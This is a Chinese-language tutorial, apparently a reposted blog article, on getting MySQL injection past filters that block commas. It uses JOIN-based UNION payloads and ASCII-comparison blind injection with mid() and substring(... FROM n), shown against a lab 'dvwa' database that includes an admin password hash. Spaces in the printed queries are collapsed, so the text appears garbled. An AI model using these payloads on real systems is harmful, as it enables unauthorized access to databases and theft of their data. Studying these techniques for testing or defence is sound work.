SQL注入技巧之显注与盲注中过滤逗号绕过的示例分析
小编给大家分享一下SQL注入技巧之显注与盲注中过滤逗号绕过的示例分析,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!
1.联合查询显注绕过逗号
在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。
绕过
在显示位上替换为常见的注入变量或其它语句
unionselect1,2,3;unionselect*from((select1)Ajoin(select2)Bjoin(select3)C);unionselect*from((select1)Ajoin(select2)Bjoin(selectgroup_concat(user(),'',database(),'',@@datadir))C);
在数据库中演示联合查询
UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截
mysql>selectuser_id,user,passwordfromusersunionselect1,2,3;+---------+-------+----------------------------------+|user_id|user|password|+---------+-------+----------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99||1|2|3|+---------+-------+----------------------------------+2rowsinset(0.04sec)
不出现逗号,使用Join来注入
mysql>selectuser_id,user,passwordfromusersunionselect*from((select1)Ajoin(select2)Bjoin(select3)C);+---------+-------+----------------------------------+|user_id|user|password|+---------+-------+----------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99||1|2|3|+---------+-------+----------------------------------+2rowsinset(0.05sec)
查询我们想要的数据
mysql>selectuser_id,user,passwordfromusersunionselect*from((select1)Ajoin(select2)Bjoin(selectgroup_concat(user(),'',database(),'',@@datadir))C);;+---------+-------+-------------------------------------------------+|user_id|user|password|+---------+-------+-------------------------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99||1|2|root@192.168.228.1dvwac:\phpStudy\MySQL\data\|+---------+-------+-------------------------------------------------+2rowsinset(0.08sec)
2.盲注中逗号绕过
MID 和substr 函数用于从文本字段中提取字符
mysql>selectmid(user(),1,2);+-----------------+|mid(user(),1,2)|+-----------------+|ro|+-----------------+1rowinset(0.04sec)
查询数据库用户名第一个字符的ascii码
mysql>selectuser_id,user,passwordfromusersunionselectascii(mid(user(),1,2)),2,3;+---------+-------+----------------------------------+|user_id|user|password|+---------+-------+----------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99||114|2|3|+---------+-------+----------------------------------+2rowsinset(0.05sec)
盲注,通过猜ascii值
mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(selectascii(mid(user(),1,2))=115);Emptysetmysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(selectascii(mid(user(),1,2))=114);+---------+-------+----------------------------------+|user_id|user|password|+---------+-------+----------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99|+---------+-------+----------------------------------+1rowinset(0.04sec)
逗号绕过SUBTTRING 函数
substring(str FROM pos)
从字符串str的起始位置pos 返回一个子串
mysql>selectsubstring('hello'from1);+---------------------------+|substring('hello'from1)|+---------------------------+|hello|+---------------------------+1rowinset(0.04sec)mysql>selectsubstring('hello'from2);+---------------------------+|substring('hello'from2)|+---------------------------+|ello|+---------------------------+1rowinset(0.03sec)
注入
mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(ascii(substring(user()from2))=114);Emptyset//substring(user()from2)为o//o的ascii为111,mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(ascii(substring(user()from2))=111);+---------+-------+----------------------------------+|user_id|user|password|+---------+-------+----------------------------------+|1|admin|5f4dcc3b5aa765d61d8327deb882cf99|+---------+-------+----------------------------------+1rowinset(0.03sec)
以上是“SQL注入技巧之显注与盲注中过滤逗号绕过的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。
